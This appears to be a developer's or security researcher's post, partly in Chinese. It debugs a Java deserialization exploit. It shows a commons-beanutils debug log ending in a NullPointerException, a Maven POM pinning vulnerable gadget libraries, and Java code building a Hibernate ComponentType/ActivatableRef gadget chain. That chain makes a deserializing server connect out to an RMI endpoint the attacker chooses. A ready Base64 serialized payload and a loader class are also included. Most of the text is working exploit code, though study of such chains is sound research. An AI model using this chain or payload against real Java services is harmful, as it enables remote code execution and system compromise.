18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.BigDecimalConverter - Setting default value: 0.0
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.BigDecimalConverter - Converting 'BigDecimal' value '0.0' to type 'BigDecimal'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.BigDecimalConverter -     No conversion required, value is already a BigDecimal
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.BigIntegerConverter - Setting default value: 0
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.BigIntegerConverter - Converting 'BigInteger' value '0' to type 'BigInteger'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.BigIntegerConverter -     No conversion required, value is already a BigInteger
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.BooleanConverter - Setting default value: false
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.BooleanConverter - Converting 'Boolean' value 'false' to type 'Boolean'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.BooleanConverter -     No conversion required, value is already a Boolean
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ByteConverter - Setting default value: 0
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ByteConverter - Converting 'Integer' value '0' to type 'Byte'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ByteConverter -     Converted to Byte value '0'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.CharacterConverter - Setting default value:  
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.CharacterConverter - Converting 'Character' value ' ' to type 'Character'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.CharacterConverter -     No conversion required, value is already a Character
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.DoubleConverter - Setting default value: 0
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.DoubleConverter - Converting 'Integer' value '0' to type 'Double'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.DoubleConverter -     Converted to Double value '0.0'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.FloatConverter - Setting default value: 0
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.FloatConverter - Converting 'Integer' value '0' to type 'Float'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.FloatConverter -     Converted to Float value '0.0'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.IntegerConverter - Setting default value: 0
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.IntegerConverter - Converting 'Integer' value '0' to type 'Integer'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.IntegerConverter -     No conversion required, value is already a Integer
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.LongConverter - Setting default value: 0
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.LongConverter - Converting 'Integer' value '0' to type 'Long'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.LongConverter -     Converted to Long value '0'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ShortConverter - Setting default value: 0
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ShortConverter - Converting 'Integer' value '0' to type 'Short'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ShortConverter -     Converted to Short value '0'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.StringConverter - Setting default value: 
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.StringConverter - Converting 'String' value '' to type 'String'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Setting default value: [Z@57a3af25
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Converting 'boolean[]' value '[Z@57a3af25' to type 'boolean[]'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter -     No conversion required, value is already a boolean[]
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Setting default value: [B@7f0eb4b4
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Converting 'byte[]' value '[B@7f0eb4b4' to type 'byte[]'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter -     No conversion required, value is already a byte[]
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Setting default value: [C@5c33f1a9
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Converting 'char[]' value '[C@5c33f1a9' to type 'char[]'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter -     No conversion required, value is already a char[]
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Setting default value: [D@1623b78d
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Converting 'double[]' value '[D@1623b78d' to type 'double[]'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter -     No conversion required, value is already a double[]
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Setting default value: [F@6adbc9d
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Converting 'float[]' value '[F@6adbc9d' to type 'float[]'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter -     No conversion required, value is already a float[]
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Setting default value: [I@4ec4f3a0
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Converting 'int[]' value '[I@4ec4f3a0' to type 'int[]'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter -     No conversion required, value is already a int[]
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Setting default value: [J@223191a6
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Converting 'long[]' value '[J@223191a6' to type 'long[]'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter -     No conversion required, value is already a long[]
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Setting default value: [S@9597028
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Converting 'short[]' value '[S@9597028' to type 'short[]'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter -     No conversion required, value is already a short[]
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Setting default value: [Ljava.math.BigDecimal;@4efbca5a
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Converting 'BigDecimal[]' value '[Ljava.math.BigDecimal;@4efbca5a' to type 'BigDecimal[]'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter -     No conversion required, value is already a BigDecimal[]
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Setting default value: [Ljava.math.BigInteger;@59662a0b
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Converting 'BigInteger[]' value '[Ljava.math.BigInteger;@59662a0b' to type 'BigInteger[]'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter -     No conversion required, value is already a BigInteger[]
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Setting default value: [Ljava.lang.Boolean;@67c27493
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Converting 'Boolean[]' value '[Ljava.lang.Boolean;@67c27493' to type 'Boolean[]'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter -     No conversion required, value is already a Boolean[]
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Setting default value: [Ljava.lang.Byte;@72967906
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Converting 'Byte[]' value '[Ljava.lang.Byte;@72967906' to type 'Byte[]'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter -     No conversion required, value is already a Byte[]
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Setting default value: [Ljava.lang.Character;@2f9f7dcf
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Converting 'Character[]' value '[Ljava.lang.Character;@2f9f7dcf' to type 'Character[]'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter -     No conversion required, value is already a Character[]
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Setting default value: [Ljava.lang.Double;@35e2d654
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Converting 'Double[]' value '[Ljava.lang.Double;@35e2d654' to type 'Double[]'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter -     No conversion required, value is already a Double[]
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Setting default value: [Ljava.lang.Float;@55183b20
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Converting 'Float[]' value '[Ljava.lang.Float;@55183b20' to type 'Float[]'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter -     No conversion required, value is already a Float[]
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Setting default value: [Ljava.lang.Integer;@6cf0e0ba
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Converting 'Integer[]' value '[Ljava.lang.Integer;@6cf0e0ba' to type 'Integer[]'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter -     No conversion required, value is already a Integer[]
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Setting default value: [Ljava.lang.Long;@130d63be
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Converting 'Long[]' value '[Ljava.lang.Long;@130d63be' to type 'Long[]'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter -     No conversion required, value is already a Long[]
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Setting default value: [Ljava.lang.Short;@293a5bf6
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Converting 'Short[]' value '[Ljava.lang.Short;@293a5bf6' to type 'Short[]'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter -     No conversion required, value is already a Short[]
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Setting default value: [Ljava.lang.String;@1283bb96
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Converting 'String[]' value '[Ljava.lang.String;@1283bb96' to type 'String[]'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter -     No conversion required, value is already a String[]
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Setting default value: [Ljava.lang.Class;@f6efaab
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Converting 'Class[]' value '[Ljava.lang.Class;@f6efaab' to type 'Class[]'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter -     No conversion required, value is already a Class[]
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Setting default value: [Ljava.util.Date;@3c19aaa5
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Converting 'Date[]' value '[Ljava.util.Date;@3c19aaa5' to type 'Date[]'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter -     No conversion required, value is already a Date[]
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Setting default value: [Ljava.util.Calendar;@409bf450
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Converting 'Calendar[]' value '[Ljava.util.Calendar;@409bf450' to type 'Calendar[]'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter -     No conversion required, value is already a Calendar[]
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Setting default value: [Ljava.io.File;@49e53c76
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Converting 'java.io.File[]' value '[Ljava.io.File;@49e53c76' to type 'java.io.File[]'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter -     No conversion required, value is already a java.io.File[]
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Setting default value: [Ljava.sql.Date;@2a3b5b47
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Converting 'java.sql.Date[]' value '[Ljava.sql.Date;@2a3b5b47' to type 'java.sql.Date[]'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter -     No conversion required, value is already a java.sql.Date[]
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Setting default value: [Ljava.sql.Time;@35d019a3
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Converting 'java.sql.Time[]' value '[Ljava.sql.Time;@35d019a3' to type 'java.sql.Time[]'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter -     No conversion required, value is already a java.sql.Time[]
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Setting default value: [Ljava.sql.Timestamp;@18078bef
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Converting 'java.sql.Timestamp[]' value '[Ljava.sql.Timestamp;@18078bef' to type 'java.sql.Timestamp[]'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter -     No conversion required, value is already a java.sql.Timestamp[]
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Setting default value: [Ljava.net.URL;@4c371370
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter - Converting 'java.net.URL[]' value '[Ljava.net.URL;@4c371370' to type 'java.net.URL[]'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ArrayConverter -     No conversion required, value is already a java.net.URL[]
Exception in thread "main" 
Exception: java.lang.NullPointerException thrown from the UncaughtExceptionHandler in thread "main"

进程已结束,退出代码为 1

依赖文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>org.example</groupId>
    <artifactId>untitled</artifactId>
    <version>1.0-SNAPSHOT</version>

    <properties>
        <maven.compiler.source>8</maven.compiler.source>
        <maven.compiler.target>8</maven.compiler.target>
        <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
    </properties>
    <dependencies>

        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
            <version>2.2.3.RELEASE</version>
        </dependency>

        <dependency>
            <groupId>org.javassist</groupId>
            <artifactId>javassist</artifactId>
            <version>3.28.0-GA</version>
        </dependency>
        <dependency>
            <groupId>commons-collections</groupId>
            <artifactId>commons-collections</artifactId>
            <version>3.2.1</version>
        </dependency>
        <dependency>
            <groupId>commons-beanutils</groupId>
            <artifactId>commons-beanutils</artifactId>
            <version>1.9.3</version>
        </dependency>

        <!-- https://mvnrepository.com/artifact/org.hibernate/hibernate-core -->
        <dependency>
            <groupId>org.hibernate</groupId>
            <artifactId>hibernate-core</artifactId>
            <version>5.6.15.Final</version>
        </dependency>
        <dependency>
            <groupId>com.caucho</groupId>
            <artifactId>hessian</artifactId>
            <version>4.0.66</version>
        </dependency>
        <dependency>
            <groupId>rome</groupId>
            <artifactId>rome</artifactId>
            <version>1.0</version>
        </dependency>
    </dependencies>
</project>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
package org.example;

import com.sun.syndication.feed.impl.EqualsBean;
import org.hibernate.engine.spi.TypedValue;
import sun.reflect.ReflectionFactory;
import sun.rmi.server.ActivatableRef;
import sun.rmi.server.UnicastRef;
import sun.rmi.transport.LiveRef;
import sun.rmi.transport.tcp.TCPEndpoint;

import java.io.*;
import java.lang.reflect.*;
import java.rmi.Remote;
import java.rmi.activation.ActivationID;
import java.rmi.activation.Activator;
import java.rmi.server.ObjID;
import java.rmi.server.RemoteObjectInvocationHandler;
import java.rmi.server.RemoteRef;
import java.util.Base64;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Random;

import static org.example.utils.setFieldValue;

public class Main {
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }
    public static <T> T createWithConstructor(Class<T> classToInstantiate, Class<? super T> constructorClass, Class<?>[] consArgTypes, Object[] consArgs) throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException, InvocationTargetException, InvocationTargetException {
        Constructor<? super T> objCons = constructorClass.getDeclaredConstructor(consArgTypes);
        objCons.setAccessible(true);
        Constructor<?> sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(classToInstantiate, objCons);
        sc.setAccessible(true);
        return (T) sc.newInstance(consArgs);
    }
    public static <T> T createWithoutConstructor(Class<T> classToInstantiate) throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException {
        return createWithConstructor(classToInstantiate, Object.class, new Class[0], new Object[0]);
    }
    public static void main(String[] args) throws Exception {
        Class<?> componentTypeClass             = Class.forName("org.hibernate.type.ComponentType");
        Class<?> pojoComponentTuplizerClass     = Class.forName("org.hibernate.tuple.component.PojoComponentTuplizer");
        Class<?> abstractComponentTuplizerClass = Class.forName("org.hibernate.tuple.component.AbstractComponentTuplizer");
        String host = "127.0.0.1";
        int    port = 13999;
        ObjID id2  = new ObjID(new Random().nextInt()); // RMI registry
        TCPEndpoint te  = new TCPEndpoint(host, port);
        UnicastRef ref = new UnicastRef(new LiveRef(id2, te, false));
        RemoteObjectInvocationHandler handler = new RemoteObjectInvocationHandler(ref);
        Object proxy = Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(), new Class[]{Remote.class, Activator.class}, handler);
        ActivationID activationID = new ActivationID((Activator) proxy);
        ActivatableRef activatableRef =(ActivatableRef) utils.createWithoutConstructor("sun.rmi.server.ActivatableRef");
        setFieldValue(activatableRef, "id", activationID);
        Method method = ActivatableRef.class.getDeclaredMethod("getRef");
        Object getter;
        try {
            Class<?>       getterImpl  = Class.forName("org.hibernate.property.access.spi.GetterMethodImpl");
            Constructor<?> constructor = getterImpl.getDeclaredConstructors()[0];
            constructor.setAccessible(true);
            getter = constructor.newInstance(null, null, method);
        } catch (Exception ignored) {
            Class<?>       basicGetter = Class.forName("org.hibernate.property.BasicPropertyAccessor$BasicGetter");
            Constructor<?> constructor = basicGetter.getDeclaredConstructor(Class.class, Method.class, String.class);
            constructor.setAccessible(true);
            getter = constructor.newInstance(activatableRef.getClass(), method, "ref");
        }
        Object tuplizer = createWithoutConstructor(pojoComponentTuplizerClass);
        Field field = abstractComponentTuplizerClass.getDeclaredField("getters");
        field.setAccessible(true);
        Object getters = Array.newInstance(getter.getClass(), 1);
        Array.set(getters, 0, getter);
        field.set(tuplizer, getters);
        Object type = createWithoutConstructor(componentTypeClass);
        setFieldValue(type,"componentTuplizer",tuplizer);
        setFieldValue(type,"propertySpan",1);
        setFieldValue(type,"propertyTypes",new org.hibernate.type.Type[]{(org.hibernate.type.Type) type});
        TypedValue typedValue = new TypedValue((org.hibernate.type.Type) type, null);
        HashMap<Object, Object> hashMap = new HashMap<>();
        hashMap.put(typedValue, "xxx");
        setFieldValue(typedValue,"value",activatableRef);
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(hashMap);
        oos.close();
        System.out.println(Base64.getEncoder().encodeToString(barr.toByteArray()));
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        Object o = (Object)ois.readObject();
    }
}
1
2
3
4
5
6
7
8
9
10
11
12
13
package org.example;

import java.io.*;
import java.util.Base64;

public class Exp {
    public static void main(String[] args) throws IOException, ClassNotFoundException {
        String base64Str = "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IAI29yZy5oaWJlcm5hdGUuZW5naW5lLnNwaS5UeXBlZFZhbHVlh4gUshmh5zwCAAJMAAR0eXBldAAZTG9yZy9oaWJlcm5hdGUvdHlwZS9UeXBlO0wABXZhbHVldAASTGphdmEvbGFuZy9PYmplY3Q7eHBzcgAgb3JnLmhpYmVybmF0ZS50eXBlLkNvbXBvbmVudFR5cGXHO08ZYmxfcgIADVoAHGNyZWF0ZUVtcHR5Q29tcG9zaXRlc0VuYWJsZWRaABJoYXNOb3ROdWxsUHJvcGVydHlaAAVpc0tleUkADHByb3BlcnR5U3BhbkwAD2NhbkRvRXh0cmFjdGlvbnQAE0xqYXZhL2xhbmcvQm9vbGVhbjtbAAdjYXNjYWRldAAoW0xvcmcvaGliZXJuYXRlL2VuZ2luZS9zcGkvQ2FzY2FkZVN0eWxlO0wAEWNvbXBvbmVudFR1cGxpemVydAAxTG9yZy9oaWJlcm5hdGUvdHVwbGUvY29tcG9uZW50L0NvbXBvbmVudFR1cGxpemVyO0wACmVudGl0eU1vZGV0ABpMb3JnL2hpYmVybmF0ZS9FbnRpdHlNb2RlO1sAC2pvaW5lZEZldGNodAAaW0xvcmcvaGliZXJuYXRlL0ZldGNoTW9kZTtbAA1wcm9wZXJ0eU5hbWVzdAATW0xqYXZhL2xhbmcvU3RyaW5nO1sAE3Byb3BlcnR5TnVsbGFiaWxpdHl0AAJbWlsADXByb3BlcnR5VHlwZXN0ABpbTG9yZy9oaWJlcm5hdGUvdHlwZS9UeXBlO1sAIXByb3BlcnR5VmFsdWVHZW5lcmF0aW9uU3RyYXRlZ2llc3QAJltMb3JnL2hpYmVybmF0ZS90dXBsZS9WYWx1ZUdlbmVyYXRpb247eHIAH29yZy5oaWJlcm5hdGUudHlwZS5BYnN0cmFjdFR5cGXJFpSxstQ41AIAAHhwAAAAAAAAAXBwc3IAM29yZy5oaWJlcm5hdGUudHVwbGUuY29tcG9uZW50LlBvam9Db21wb25lbnRUdXBsaXplcsBwOcjTg59YAgAETAAOY29tcG9uZW50Q2xhc3N0ABFMamF2YS9sYW5nL0NsYXNzO0wACW9wdGltaXplcnQAMExvcmcvaGliZXJuYXRlL2J5dGVjb2RlL3NwaS9SZWZsZWN0aW9uT3B0aW1pemVyO0wADHBhcmVudEdldHRlcnQAKkxvcmcvaGliZXJuYXRlL3Byb3BlcnR5L2FjY2Vzcy9zcGkvR2V0dGVyO0wADHBhcmVudFNldHRlcnQAKkxvcmcvaGliZXJuYXRlL3Byb3BlcnR5L2FjY2Vzcy9zcGkvU2V0dGVyO3hyADdvcmcuaGliZXJuYXRlLnR1cGxlLmNvbXBvbmVudC5BYnN0cmFjdENvbXBvbmVudFR1cGxpemVy8vZxKVYnaN0CAAVaABJoYXNDdXN0b21BY2Nlc3NvcnNJAAxwcm9wZXJ0eVNwYW5bAAdnZXR0ZXJzdAArW0xvcmcvaGliZXJuYXRlL3Byb3BlcnR5L2FjY2Vzcy9zcGkvR2V0dGVyO0wADGluc3RhbnRpYXRvcnQAIkxvcmcvaGliZXJuYXRlL3R1cGxlL0luc3RhbnRpYXRvcjtbAAdzZXR0ZXJzdAArW0xvcmcvaGliZXJuYXRlL3Byb3BlcnR5L2FjY2Vzcy9zcGkvU2V0dGVyO3hwAAAAAAB1cgA1W0xvcmcuaGliZXJuYXRlLnByb3BlcnR5LmFjY2Vzcy5zcGkuR2V0dGVyTWV0aG9kSW1wbDu/pSysWxHxpwIAAHhwAAAAAXNyAD1vcmcuaGliZXJuYXRlLnByb3BlcnR5LmFjY2Vzcy5zcGkuR2V0dGVyTWV0aG9kSW1wbCRTZXJpYWxGb3JtrFu2VsndG1gCAARMAA5jb250YWluZXJDbGFzc3EAfgATTAAOZGVjbGFyaW5nQ2xhc3NxAH4AE0wACm1ldGhvZE5hbWV0ABJMamF2YS9sYW5nL1N0cmluZztMAAxwcm9wZXJ0eU5hbWVxAH4AH3hwcHZyAB1zdW4ucm1pLnNlcnZlci5BY3RpdmF0YWJsZVJlZmkuOvZUvgduDAAAeHB0AAZnZXRSZWZwcHBwcHBwcHBwcHVyABpbTG9yZy5oaWJlcm5hdGUudHlwZS5UeXBlO36vq6HklWGaAgAAeHAAAAABcQB+ABFwc3EAfgAhc3IAIGphdmEucm1pLmFjdGl2YXRpb24uQWN0aXZhdGlvbklEwAq0Rj/brq0DAAB4cHNyABNqYXZhLnJtaS5zZXJ2ZXIuVUlEDxJwDb82TxICAANTAAVjb3VudEoABHRpbWVJAAZ1bmlxdWV4cIACAAABmtkHl3p6UFPSdzIAClVuaWNhc3RSZWYACTEyNy4wLjAuMQAANq//////gmmjDQAAAAAAAAAAAAAAAAAAAHh3AgAAeHQABHN1MTh4";
        byte[] decode = Base64.getDecoder().decode(base64Str);
        ByteArrayInputStream bin = new ByteArrayInputStream(decode);
        new ObjectInputStream(bin).readObject();
    }
}